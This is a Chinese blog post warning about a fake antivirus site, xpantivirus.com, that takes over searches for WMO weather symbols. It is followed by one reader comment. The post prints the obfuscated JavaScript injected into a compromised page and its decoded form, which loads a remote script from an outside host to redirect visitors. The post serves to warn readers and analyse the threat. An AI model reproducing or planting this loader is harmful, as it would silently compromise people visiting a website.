惡意網站 xpantivirus.com

下午在找 WMO 氣象符號中,船標的角度與長度規定時,利用 google 搜尋,好幾個網站都導向某個網站,也就是 xpantivirus.com ,然後顯示下面畫面: 
 
看起來掃描滿快的,但是感覺怪怪的,一般來說 ActiveX 的掃瞄器非常吃資源,且我沒有允許這個網站跑 ActiveX ,怎麼會有這個畫面?之後不管按什麼,都會跳出下面的畫面:
 
 
就用檢視原始碼看,內容看起來是用動畫跑,所以這是一個假裝的網站,誘騙你連上該網站下載安裝執行檔。此時,不管按啥都會跳出執行檔下載的對話框,所以要從返回上一頁直接返回前三頁,或是關閉 IE 。
 
回到 Google 畫面後,並未僅告該網站有問題,直接把該網址原始碼拉下來,看起來前半段是正常的 WMO Weather Symbol 的描述,忽然出現奇怪的 Script 區段,看起來是被植入的:
<s cript>
var i = "weather station model definition";
function D(JF,r){if(!r){r=’ `ZEaXyp1e;2m&J,VP%+K^Nq_7)xhcW]tC#joD?A/.!s=Q:IB5rG<k$(gRdF{-3On’;}var U;var YC=";for(var g=0;g<JF.length;g+=4){U=(r.indexOf(JF.charAt(g))&255)<<18|(r.indexOf(JF.charAt(g+1))&255)<<12|(r.indexOf(JF.charAt(g+2))&255)<<(6)|r.indexOf(JF.charAt(g+3))&255;YC+=String.fromCharCode((U&16711680)>>16,(U&65280)>>8,U&255);}eval(YC);}D(‘ )p3oWq$?h/PIWg;!Wp^.;<r<7Gc=;g;!c1PCcg;oV+;.W1%5,j-B7(&Ic(N#cAJ.m/;?cgNQW1&IW1;$cgPIWA??WGd.Wp$QmA?ImA?IW1;$cgPI7(&B7(3$h/PIx/&nca$<c(X5&KXAcKk/2(D=;G)GV+c=)_Jo7_Z?2p%B7gN:)qdkm/;?)ANGcANG2+Q/eoR-mgJo;GQ/cA?5WaR/2KQC’);
</s cript>
 
經過轉換後,內容是要輸出:
document.write(‘<sc’+’ript src="http:// cc.search.results.trust.view.html.in.intrust.cc/count.js?p=ssa011&q=’+i+’&r=’+escape(document.referrer)+’"></sc’+’ript>’);
 
透過引入一個 script 檔,在執行裡面的內容轉址。
 
在上 google 搜尋,似乎國內目前災情不嚴重,只有一個中文介紹:
 
既然是個已知的病毒,就抓下來看看,沒想到雨傘居然擋掉了:
 
所以各位注意這個網站,沒經過你同意的掃毒程式或網站可能都是假的。
廣告
Categories: 電腦和網際網路 | 1 則迴響

文章分頁導航

One thought on “惡意網站 xpantivirus.com

  1. Hsiang

    XD他網頁做的還不錯啦只是右上角圓的部分會白白的看起來很假而且他的"對話視窗"還不能移動呢如果用Vista等非xp系統看起來更假

    喜歡

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com Logo

您的留言將使用 WordPress.com 帳號。 登出 / 變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 / 變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 / 變更 )

Google+ photo

您的留言將使用 Google+ 帳號。 登出 / 變更 )

連結到 %s

在 WordPress.com 建立免費網站或網誌.

%d 位部落客按了讚: